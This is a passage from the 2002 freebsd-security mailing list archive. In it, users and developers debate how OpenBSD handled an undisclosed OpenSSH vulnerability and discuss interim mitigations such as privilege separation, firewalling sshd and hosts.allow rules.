(List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --mYCpIKhGyMATD0i+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 25, 2002 at 12:42:28PM +1000, Darren Reed wrote: >=20 > I'd like to recommend others do the same but that'll depend on your > networks and whether they can live without that sort of remote access > for a week or so. Do we live in the stone age? Most of us have static IPs, just allow only t= rusted workstations to=20 access your sshd's.. simple solution until the patch + advisory are out. --=20 Regards, Dalin S. Owen Nexus XI Corp. Email: dowen@nexusxi.com Web: http://www.nexusxi.com/ --mYCpIKhGyMATD0i+ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0X2jsACgkQKZhyFXMVXuKehQCeNVhcMRQOjJKYu03xgEXnXV3M XTIAoOkocqdmE5erhqEsZFJivms7C3u5 =yVCL -----END PGP SIGNATURE----- --mYCpIKhGyMATD0i+-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:52:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id A641237B401; Mon, 24 Jun 2002 19:52:33 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 314E84C; Mon, 24 Jun 2002 21:52:33 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5P2qWiD043854; Mon, 24 Jun 2002 21:52:32 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5P2qWue043853; Mon, 24 Jun 2002 21:52:32 -0500 (CDT) Date: Mon, 24 Jun 2002 21:52:32 -0500 From: "Jacques A. Vidrine" To: Robert Watson Cc: FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020625025232.GC43738@madman.nectar.cc> References: <20020624220229.A92101@cowbert.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 10:18:19PM -0400, Robert Watson wrote: > In order to do this and maintain PAM > support, we'll be jumping from the base OpenSSH distribution to the > OpenSSH-portable distribution, which includes support for PAM (as PAM is > not used in OpenBSD). As a side note, this just forced the issue. It is kind of a historical mistake that OpenSSH-portable was not imported in the first place, and there have been several discussions to make this switch in the past. DES has been kind enough to make the switch with this upgrade (or maybe he is just trying to save some of his sanity :-) > It's not yet clear how we should handle OpenSSH and the various RELENG_4_X > branches; it might depend a bit on the complexity of the merge work and > the nature of the vulnerability once vulnerability information is > published. It entirely depends on these things. Due to the nature of the branch (minimize featuritus, just security bug fixes), my feeling is that OpenSSH will simply be patched, once we know what the problem is. One following the RELENG_4_X branches _generally_ should not need to reconfigure their systems, and this precludes most whole-package updates. > Typically for patch levels on released versions, we've adopted > a highly conservative approach for security bug fixes, avoiding complex > and risky changes and leaning in a more minimal direction. Obviously > which way we go on that one will depend on the nature of the > vulnerability. Oops, I think I just repeated what you said. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:53:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id F09EC37B408 for ; Mon, 24 Jun 2002 19:53:11 -0700 (PDT) Received: (qmail 9389 invoked by uid 0); 25 Jun 2002 02:53:10 -0000 Received: from pd950a5da.dip.t-dialin.net (HELO gmx.net) (217.80.165.218) by mail.gmx.net (mp004-rz3) with SMTP; 25 Jun 2002 02:53:10 -0000 Message-ID: <3D17DAEB.5000106@gmx.net> Date: Tue, 25 Jun 2002 04:52:27 +0200 From: Michael Nottebrock User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: peter.lai@uconn.edu Cc: Chris BeHanna , FreeBSD Security , deraadt@cvs.openbsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) References: <20020624163538.H10398-100000@yez.hyperreal.org> <20020624212557.R7245-100000@topperwein.dyndns.org> <20020624220229.A92101@cowbert.2y.net> X-Enigmail-Version: 0.61.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enigD77E41809FAD12F345453571" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following is an OpenPGP/MIME signed message created by Enigmail/Mozilla, following RFC 2440 and RFC 2015 --------------enigD77E41809FAD12F345453571 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Peter C. Lai wrote: > Is OpenSSH 3.3 now part of the base system? So are we phasing out > ssh as part of the base system (since the answer to the first > question is no, and therefore only the portable versions > have privsep available)? Well, the OpenSSH-Team does not and probably cannot support all those releases floating around in various OSes, Linux-Distributions etc. They do a reasonable job to make sure that people who run a supported release (e.g. the current one) experience as few troubles as possible. It seems like FreeBSD (thanks des!) will now try to provide its users with the 'latest and greatest' openssh-portable in the base system (which is really cool, because that way, openssh-portable will get much more thorough testing on the FreeBSD platform and fixes and experience from that will be getting back to the OpenSSH developers), so maybe we'll be able to be more relaxed about such unfortunate news in the future. Regards, -- Michael Nottebrock "The circumstance ends uglily in the cruel result." - Babelfish --------------enigD77E41809FAD12F345453571 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9F9rxXhc68WspdLARAn9UAJ9r6vW3X6h0lfK2Dixfw89dC0sQKQCaAr/8 oxaUxj+hMzrNCMrgm9QSUOY= =rfhn -----END PGP SIGNATURE----- --------------enigD77E41809FAD12F345453571-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:54:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 83F9937B411 for ; Mon, 24 Jun 2002 19:53:21 -0700 (PDT) Received: (qmail 6126 invoked by uid 1000); 25 Jun 2002 02:53:20 -0000 Date: Mon, 24 Jun 2002 20:53:20 -0600 From: "Dalin S. Owen" To: Theo de Raadt Cc: freebsd-security@freebsd.org Subject: Re: Hogwash Message-ID: <20020624205320.A6008@nexusxi.com> References: <20020625024401.GB43738@madman.nectar.cc> <200206250248.g5P2mJLJ031907@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="XsQoSWH+UP9D9v3l" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206250248.g5P2mJLJ031907@cvs.openbsd.org>; from deraadt@cvs.openbsd.org on Mon, Jun 24, 2002 at 08:48:19PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --XsQoSWH+UP9D9v3l Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jun 24, 2002 at 08:48:19PM -0600, Theo de Raadt wrote: > And you have been told how to immunize. You are not being told more. > Nor are IBM, Apple, HP, SGI, Sun, any of the Linux distributions, the > other BSD's, or any of the other misc embedded systems that use the > code. Fair is fair, guys. Telling anyone more info about this could compromise a= lot of systems. Get the=20 workarounds running, we have all had fair warning. --=20 Regards, Dalin S. Owen Nexus XI Corp. Email: dowen@nexusxi.com Web: http://www.nexusxi.com/ --XsQoSWH+UP9D9v3l Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0X2yAACgkQKZhyFXMVXuKFvgCbBFWvTh6q2TaPPjYEyXDm+O5J Vo8AoMce1hqyMrcGtdf6XY36pvzFyF4B =s1/6 -----END PGP SIGNATURE----- --XsQoSWH+UP9D9v3l-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:56: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from erouter0.it-datacntr.louisville.edu (erouter0.it-datacntr.louisville.edu [136.165.1.36]) by hub.freebsd.org (Postfix) with ESMTP id E368237B4D3; Mon, 24 Jun 2002 19:55:25 -0700 (PDT) Received: from osaka.louisville.edu (osaka.louisville.edu [136.165.1.114]) by erouter0.it-datacntr.louisville.edu (Postfix) with ESMTP id 1A2FE177E; Mon, 24 Jun 2002 22:55:25 -0400 (EDT) Received: by osaka.louisville.edu (Postfix, from userid 15) id E140EA6; Mon, 24 Jun 2002 22:55:24 -0400 (EDT) Date: Mon, 24 Jun 2002 22:55:24 -0400 From: Keith Stevenson To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020624225524.A96380@osaka.louisville.edu> References: <20020625010643.GC43386@madman.nectar.cc> <200206250111.g5P1BVLJ015666@cvs.openbsd.org> <20020625024401.GB43738@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020625024401.GB43738@madman.nectar.cc>; from nectar@FreeBSD.ORG on Mon, Jun 24, 2002 at 09:44:01PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I hate to intrude on the conversation, but what is FreeBSD's official response to this? Posturing and full-disclosure debates aside, I'm inclined to take Theo's warning at face value. I know better than to expect my commercial UNIX vendor to act swiftly, but I've come to expect more from the FreeBSD project. If FreeBSD is going to wait until after the exploits are published, please let us know now so I can plan appropriately. Regards, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville keith.stevenson@louisville.edu GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE On Mon, Jun 24, 2002 at 09:44:01PM -0500, Jacques A. Vidrine wrote: > On Mon, Jun 24, 2002 at 07:11:30PM -0600, Theo de Raadt wrote: > > > I'd > > > rather we had the information now to make wise choices about what to > > > do with deployed systems, custom hacks, and older-but-still-supported > > > releases --- knowing there is a possibility for `leakage' that grows > > > with time. > > > > Ask your vendor. > > I _am_ the vendor. > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:57:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 328DC37B407 for ; Mon, 24 Jun 2002 19:56:25 -0700 (PDT) Received: (qmail 6224 invoked by uid 1000); 25 Jun 2002 02:56:24 -0000 Date: Mon, 24 Jun 2002 20:56:24 -0600 From: "Dalin S. Owen" To: Garrett Wollman Cc: freebsd-security@freebsd.org Subject: Re: Hogwash Message-ID: <20020624205624.A6133@nexusxi.com> References: <200206250146.g5P1kXLI030924@cvs.openbsd.org> <200206250242.MAA08539@caligula.anu.edu.au> <20020624204931.A5883@nexusxi.com> <200206250252.g5P2qA11009644@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OXfL5xGRrasGEqWY" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206250252.g5P2qA11009644@khavrinen.lcs.mit.edu>; from wollman@lcs.mit.edu on Mon, Jun 24, 2002 at 10:52:10PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --OXfL5xGRrasGEqWY Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jun 24, 2002 at 10:52:10PM -0400, Garrett Wollman wrote: > <= said: >=20 > > Do we live in the stone age? Most of us have static IPs, just allow on= ly t=3D > > rusted workstations to=3D20 > > access your sshd's.. simple solution until the patch + advisory are out. >=20 > In which universe do you live? It sure must be nice, not having any > ISPs to interfere with your security policy.... >=20 > -GAWollman >=20 I guess it is a bit easier for me, as we own all of the IPs. --=20 Regards, Dalin S. Owen Nexus XI Corp. Email: dowen@nexusxi.com Web: http://www.nexusxi.com/ --OXfL5xGRrasGEqWY Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0X29gACgkQKZhyFXMVXuK4fgCgtrcNLcTAm4fqnJN1u9jXYc7J ITEAoNZ0DfAriPMtiC4P0afMEy/PCkNZ =odP8 -----END PGP SIGNATURE----- --OXfL5xGRrasGEqWY-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 20:10:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (eth0.lnk.aims.com.au [203.31.73.253]) by hub.freebsd.org (Postfix) with ESMTP id 3D63437B400 for ; Mon, 24 Jun 2002 20:10:12 -0700 (PDT) Received: from postoffice.aims.com.au (nts-ts1.aims.private [192.168.10.2]) by postoffice.aims.com.au with ESMTP id g5P3AAm64786 for ; Tue, 25 Jun 2002 13:10:10 +1000 (EST) (envelope-from chris@aims.com.au) Received: from ntsts1 by aims.com.au with SMTP (MDaemon.v3.5.3.R) for ; Tue, 25 Jun 2002 13:09:30 +1000 Reply-To: From: "Chris Knight" To: Cc: Subject: RE: Hogwash Date: Tue, 25 Jun 2002 13:09:28 +1000 Message-ID: <005301c21bf5$b8d32ce0$020aa8c0@aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020624225524.A96380@osaka.louisville.edu> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal X-Return-Path: chris@aims.com.au X-MDaemon-Deliver-To: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Howdy, > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Keith > Stevenson > Sent: Tuesday, 25 June 2002 12:55 > To: Jacques A. Vidrine > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Hogwash > > I hate to intrude on the conversation, but what is FreeBSD's > official response to this? Posturing and full-disclosure debates > aside, I'm inclined to take Theo's warning at face value. I > know better than to expect my commercial UNIX vendor to act > swiftly, but I've come to expect more from the FreeBSD project. > If FreeBSD is going to wait until after the exploits are > published, please let us know now so I can plan appropriately. > I don't know what the official response will be, but given the lack of information regarding the exploit, plus it's effect on a privsep enabled ssh, it would be mad not to recommend either turning off sshd, or where that is not possible, use firewalling rules to restrict ssh access to a limited number of hosts. I can understand Theo's concern, but the side effect of his actions is simply causing FUD. There will be no guarantee that vendor implementation of privsep will stop the exploit, so turning ssh off or restricting its access is the wisest course of action. > Regards, > --Keith Stevenson-- > Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 20:28:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from giroc.albury.net.au (giroc.albury.NET.AU [203.15.244.13]) by hub.freebsd.org (Postfix) with ESMTP id 11B5E37B403 for ; Mon, 24 Jun 2002 20:28:12 -0700 (PDT) Received: from giroc.albury.net.au (giroc.albury.net.au [203.15.244.13]) by giroc.albury.net.au (8.11.1/8.11.1) with ESMTP id g5P3S8728943; Tue, 25 Jun 2002 13:28:08 +1000 (EST) X-Delivered-To: freebsd-security@FreeBSD.ORG Date: Tue, 25 Jun 2002 13:28:08 +1000 (EST) From: X-X-Sender: To: Chris Knight Cc: , Subject: RE: Hogwash In-Reply-To: <005301c21bf5$b8d32ce0$020aa8c0@aims.private> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Chris Knight wrote: > I don't know what the official response will be, but given the lack > of information regarding the exploit, plus it's effect on a privsep > enabled ssh, it would be mad not to recommend either turning off > sshd, or where that is not possible, use firewalling rules to > restrict ssh access to a limited number of hosts. Does anyone know how hosts.allow rules (and/or tcpwrappers) will affect this vulnerability? If one has sshd: ip.of.trusted.host, ip.of.also-trusted.host in /etc/hosts.allow, is that still "sufficiently" safe to live with in the short term? TIA, RossW To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 20:29:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from edgemaster.zombie.org (ip68-13-69-9.om.om.cox.net [68.13.69.9]) by hub.freebsd.org (Postfix) with ESMTP id 7535A37B400; Mon, 24 Jun 2002 20:29:28 -0700 (PDT) Received: by edgemaster.zombie.org (Postfix, from userid 1001) id D444466B05; Mon, 24 Jun 2002 22:29:27 -0500 (CDT) Date: Mon, 24 Jun 2002 22:29:27 -0500 From: Sean Kelly To: Theo de Raadt Cc: Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625032927.GA6579@edgemaster.zombie.org> References: <87sn3c6rte.fsf@gray.impulse.net> <200206250203.g5P238LJ002003@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206250203.g5P238LJ002003@cvs.openbsd.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 08:03:08PM -0600, Theo de Raadt wrote: > I'm not giving away any hints. Assume the worst and do the upgrade, > and if you dislike the way I handled this, don't buy me that beer > later. I'm just curious when this OpenBSD policy change took effect. According to http://www.openbsd.org/security.html#disclosure: Full Disclosure Like many readers of the BUGTRAQ mailing list, we believe in full disclosure of security problems. In the operating system arena, we were probably the first to embrace the concept. Many vendors, even of free software, still try to hide issues from their users. Security information moves very fast in cracker circles. On the other hand, our experience is that coding and releasing of proper security fixes typically requires about an hour of work -- very fast fix turnaround is possible. Thus we think that full disclosure helps the people who really care about security. Not all of us are in the position to use cutting edge OpenSSH-portable versions. By you holding back this information, you are only hurting those who *CAN'T* upgrade to your latest and greatest. Has there actually been enough testing of privsep to say that it contains no bugs? It seems to me that we'd all be better off if you just released a diff and let us all fix our own wounds. -- Sean Kelly | PGP KeyID: 77042C7B smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 20:31:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 67B9937B401; Mon, 24 Jun 2002 20:31:43 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P3WQLJ024062; Mon, 24 Jun 2002 21:32:26 -0600 (MDT) Message-Id: <200206250332.g5P3WQLJ024062@cvs.openbsd.org> To: Sean Kelly Cc: Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Mon, 24 Jun 2002 22:29:27 CDT." <20020625032927.GA6579@edgemaster.zombie.org> Date: Mon, 24 Jun 2002 21:32:26 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This one is clearly different. We have a tool which can avoid people being holed, without having to publish a patch. If you don't understand that, please go back and study the situation more. By holding this information back for a few more days, we are permitting a very important protocol to be upgraded in an immune way, OR YOU CAN TURN IT OFF NOW. > On Mon, Jun 24, 2002 at 08:03:08PM -0600, Theo de Raadt wrote: > > I'm not giving away any hints. Assume the worst and do the upgrade, > > and if you dislike the way I handled this, don't buy me that beer > > later. > > I'm just curious when this OpenBSD policy change took effect. According to > http://www.openbsd.org/security.html#disclosure: > > Full Disclosure > Like many readers of the BUGTRAQ mailing list, we believe in > full disclosure of security problems. In the operating system > arena, we were probably the first to embrace the concept. Many > vendors, even of free software, still try to hide issues from > their users. > > Security information moves very fast in cracker circles. On the > other hand, our experience is that coding and releasing of > proper security fixes typically requires about an hour of work > -- very fast fix turnaround is possible. Thus we think that > full disclosure helps the people who really care about > security. > > Not all of us are in the position to use cutting edge OpenSSH-portable > versions. By you holding back this information, you are only hurting those > who *CAN'T* upgrade to your latest and greatest. Has there actually been > enough testing of privsep to say that it contains no bugs? It seems to me > that we'd all be better off if you just released a diff and let us all fix > our own wounds. > > -- > Sean Kelly | PGP KeyID: 77042C7B > smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 20:41:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 1206D37B41C for ; Mon, 24 Jun 2002 20:40:28 -0700 (PDT) Received: (qmail 7172 invoked by uid 1000); 25 Jun 2002 03:40:27 -0000 Date: Mon, 24 Jun 2002 21:40:27 -0600 From: "Dalin S. Owen" To: Brian Behlendorf Cc: freebsd-security@freebsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020624214027.A7100@nexusxi.com> References: <20020624203146.A5507@nexusxi.com> <20020624202204.P310-100000@yez.hyperreal.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="EVF5PPMfhYS0aIcm" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020624202204.P310-100000@yez.hyperreal.org>; from brian@hyperreal.org on Mon, Jun 24, 2002 at 08:22:28PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --EVF5PPMfhYS0aIcm Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable You can't compromise it if you can't connect to it. :) On Mon, Jun 24, 2002 at 08:22:28PM -0700, Brian Behlendorf wrote: >=20 > Well, the choice to preserve that behavior and run a potentially > compromiseable sshd is yours. >=20 > Brian >=20 > On Mon, 24 Jun 2002, Dalin S. Owen wrote: > > I can't do that, as I use the login.conf caps that only work with the F= reeBSD-bundled ssh. > > > > On Mon, Jun 24, 2002 at 04:38:17PM -0700, Brian Behlendorf wrote: > > > On Mon, 24 Jun 2002, Dalin S. Owen wrote: > > > > FreeBSD's OpenSSH is too old, it doesn't have PrivSep.. :( So firew= all > > > > your port 22 guys. :) > > > > > > I upgraded to openssh-portable 3.3p1 from ports; note that this morni= ng > > > the port was updated to build openssl 0.9.6d as well, rather than use > > > FreeBSD's openssl libs. > > > > > > I also had to enable privsep; this requires creating an sshd user & g= roup, > > > and creating an empty /var/empty/ for the priv separator to chroot to. > > > Hopefully the openssh-portable port can be updated to create that acc= ount > > > & dir at some point, since privsep is on now be default. > > > > > > Brian > > > > > > > > > > > > > >=20 --=20 Regards, Dalin S. Owen Nexus XI Corp. Tel: +1-780-708-2480 Email: dowen@nexusxi.com Web: http://www.nexusxi.com/ --EVF5PPMfhYS0aIcm Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0X5ioACgkQKZhyFXMVXuKFBACeKFNGc8+Tdc6Uur484hXhXO4v w5MAoK5zp5PGNAuRyR7HWsnh++65oXwW =xPl6 -----END PGP SIGNATURE----- --EVF5PPMfhYS0aIcm-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 20:42:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 9899837B4A3 for ; Mon, 24 Jun 2002 20:41:54 -0700 (PDT) Received: (qmail 7195 invoked by uid 1000); 25 Jun 2002 03:41:53 -0000 Date: Mon, 24 Jun 2002 21:41:53 -0600 From: "Dalin S. Owen" To: freebsd-lists@albury.net.au Cc: freebsd-security@freebsd.org Subject: Re: Hogwash Message-ID: <20020624214153.B7100@nexusxi.com> References: <005301c21bf5$b8d32ce0$020aa8c0@aims.private> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="61jdw2sOBCFtR2d/" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from freebsd-lists@albury.net.au on Tue, Jun 25, 2002 at 01:28:08PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --61jdw2sOBCFtR2d/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Trusting TCP wrappers is like trusting inetd with heavy load. :) On Tue, Jun 25, 2002 at 01:28:08PM +1000, freebsd-lists@albury.net.au wrote: >=20 > On Tue, 25 Jun 2002, Chris Knight wrote: >=20 > > I don't know what the official response will be, but given the lack > > of information regarding the exploit, plus it's effect on a privsep > > enabled ssh, it would be mad not to recommend either turning off > > sshd, or where that is not possible, use firewalling rules to > > restrict ssh access to a limited number of hosts. >=20 > Does anyone know how hosts.allow rules (and/or tcpwrappers) will affect > this vulnerability? >=20 > If one has > sshd: ip.of.trusted.host, ip.of.also-trusted.host > in /etc/hosts.allow, is that still "sufficiently" safe to live with in > the short term? >=20 > TIA, > RossW >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --=20 Regards, Dalin S. Owen Nexus XI Corp. Email: dowen@nexusxi.com Web: http://www.nexusxi.com/ --61jdw2sOBCFtR2d/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0X5oAACgkQKZhyFXMVXuJJHgCfenI9SHTNv993UfN56HTdh9fP UqIAoNGhsLKGC3zzHrnc0shwgy8H00GK =aZF3 -----END PGP SIGNATURE----- --61jdw2sOBCFtR2d/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:19:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from edgemaster.zombie.org (ip68-13-69-9.om.om.cox.net [68.13.69.9]) by hub.freebsd.org (Postfix) with ESMTP id DAED837B400; Mon, 24 Jun 2002 21:19:46 -0700 (PDT) Received: by edgemaster.zombie.org (Postfix, from userid 1001) id 431B666B04; Mon, 24 Jun 2002 23:19:46 -0500 (CDT) Date: Mon, 24 Jun 2002 23:19:46 -0500 From: Sean Kelly To: Theo de Raadt Cc: Ted Cabeen , "Jacques A. 